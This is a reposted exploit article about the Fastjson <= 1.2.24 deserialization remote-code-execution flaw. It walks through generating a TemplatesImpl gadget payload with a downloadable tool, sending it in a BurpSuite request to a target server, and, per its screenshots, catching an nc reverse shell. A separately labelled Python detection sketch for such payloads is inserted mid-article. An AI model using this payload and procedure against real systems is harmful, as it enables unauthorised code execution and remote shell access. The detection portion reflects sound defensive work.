[Exploit] Fastjson Deserialization Vulnerability: A Reverse-Shell Tool


Vulnerability description

1. Vulnerability analysis

https://www.secfree.com/article-590.html

Use the Fastjson deserialization exploit tool to generate a payload for an RCE attack.

2. Run the PoC Fastjson-Payload.jar

#####################################################################
#                                                                   #
#                       Fastjson 反序列化 RCE                       #
#                                                                   #
#                          www.secfree.com                          #
#                                                                   #
#####################################################################

[*] Usage: java -jar Fastjson-Payload.jar --use 20170315
         20170315 => {[fastjson <= 1.2.24] [https://github.com/alibaba/fastjson/wiki/security_update_20170315]}

3. Generate the payload with module 20170315

PS C:\Users\Bearcat\Desktop> java -jar .\Fastjson-Payload.jar -use 20170315

[+] Usage => [fastjson <= 1.2.24]
[+] Generate Payload

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["<base64-encoded class bytes omitted>"],"_name":"shit","_tfactory":{},"_outputProperties":{}}

4. Carry out the deserialization attack with BurpSuite

HTTP request:

POST /fastjson-1.0/ HTTP/1.1
Host: 192.168.0.104:8887
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 5369

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["<base64-encoded class bytes omitted>"],"_name":"shit","_tfactory":{},"_outputProperties":{}}

HTTP response:

HTTP/1.1 500 
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Dec 2017 15:09:36 GMT
Connection: close
Content-Length: 53500 Internal Error
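
The request above has a recognisable shape: a JSON object whose "@type" names TemplatesImpl and whose "_bytecodes" array holds a base64-encoded Java class. The following detection sketch is an added example, not part of the original article or the Fastjson-Payload tool; the function names, finding labels and sample bodies are assumptions made for illustration.

```python
import base64
import json

CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # first four bytes of every Java class file
SUSPECT_TYPE = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"

def _walk(node):
    """Yield every dict nested anywhere inside a parsed JSON value."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk(value)

def _is_class_blob(value):
    """True if value is base64 text whose first bytes are the class magic."""
    if not isinstance(value, str):
        return False
    try:
        return base64.b64decode(value[:8], validate=True).startswith(CLASS_MAGIC)
    except ValueError:
        return False

def inspect_body(body):
    """Return triage findings for one HTTP request body given as a string."""
    try:
        doc = json.loads(body)
    except ValueError:  # Fastjson accepts lenient JSON, so fall back to a substring check
        return ["autotype-marker-unparsed"] if "@type" in body else []
    findings = []
    for obj in _walk(doc):
        type_name = obj.get("@type")
        if not isinstance(type_name, str):
            continue
        findings.append("autotype:" + type_name)
        if type_name == SUSPECT_TYPE:
            findings.append("templatesimpl-gadget")
        blobs = obj.get("_bytecodes")
        if isinstance(blobs, list) and any(_is_class_blob(b) for b in blobs):
            findings.append("embedded-class-bytes")
    return findings

# Constructed samples: the blob is 8 header bytes, not a real class file.
_FAKE_CLASS = base64.b64encode(CLASS_MAGIC + b"\x00\x00\x00\x34").decode()
SAMPLE_MALICIOUS = json.dumps({"@type": SUSPECT_TYPE, "_bytecodes": [_FAKE_CLASS]})
SAMPLE_BENIGN = json.dumps({"user": "alice", "items": [{"id": 1}]})
print(inspect_body(SAMPLE_MALICIOUS), inspect_body(SAMPLE_BENIGN))
```

An "autotype:" finding on its own only means the body names a class for Fastjson to instantiate, which some applications do legitimately; the gadget and class-bytes findings are the ones that match the request shown here.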

5. Command executed successfully

[Image: 20171202232515.gif]

6. Get a reverse shell with nc

[Image: payload-shell.png]

[Image: 20171203185630.gif]

7. Download

https://github.com/iBearcat/Fastjson-Payload

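Copyright of this article belongs to the original author. Reposting requires the author's permission and must credit the source: http://www.secfree.com/article-591.html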
